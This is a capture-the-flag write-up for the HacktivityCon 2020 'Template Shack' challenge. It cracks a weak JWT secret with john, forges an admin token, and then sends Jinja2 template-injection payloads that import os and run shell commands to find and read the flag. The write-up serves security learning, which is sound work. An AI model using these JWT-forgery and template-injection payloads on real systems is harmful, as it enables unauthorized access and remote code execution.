Tags: jinja web jinja2 template-injection hacktivityconctf2020
Rating:
## Write up Template Shack
On the website we got a session-token and token that seems to be a jwt:
to get the secret we have to bruteforce the jwt, using john:
``echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.9SvIFMTsXt2gYNRF9I0ZhRhLQViY-MN7VaUutz9NA9Y" > jwt.hash``
To crack it:
``john jwt.hash -w=/usr/share/wordlists/rockyou.txt``
we get the secret as ``supersecret``
Decoding it:
Now it's time to create a new token and sign it using the jwt_tool:
Using the tool to change guest for admin and sign it with the key:
Our brand new jwt token with "admin" ``eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ykqid4LTnSPZtoFb11H+/2q+Vo32g4mLpkEcajK0H7I``
changing the token with this value gives us access to de admin panel:
I noticed that inside the admin template when a webpage doesn't exists it renders the endpoint on the 404, for example if I look for /admin/abt.html I got:
This added to the name of the challenge made me think about template injection and bingo:
So there is probably python running on the backgroung as this is a feature of flask jinja so let's find it out with ``{{ [].__class__.__base__.__subclasses__() }}``:
So now we just need to use the os library to read the flag:
``{{ request.application.__globals__.__builtins__}}}`` we can access the builtins so we will try to import the os with ``{ request.application.__globals__.__builtins__.__import__('os')}}``
Its time to find the flag.txt ``{{ request.application.__globals__.__builtins__.__import__('os').popen('find / -name flag.txt').read()}}``
and finally cat the flag ``{{ request.application.__globals__.__builtins__.__import__('os').popen('cat /home/user/flag.txt').read()}}``
And that was all!
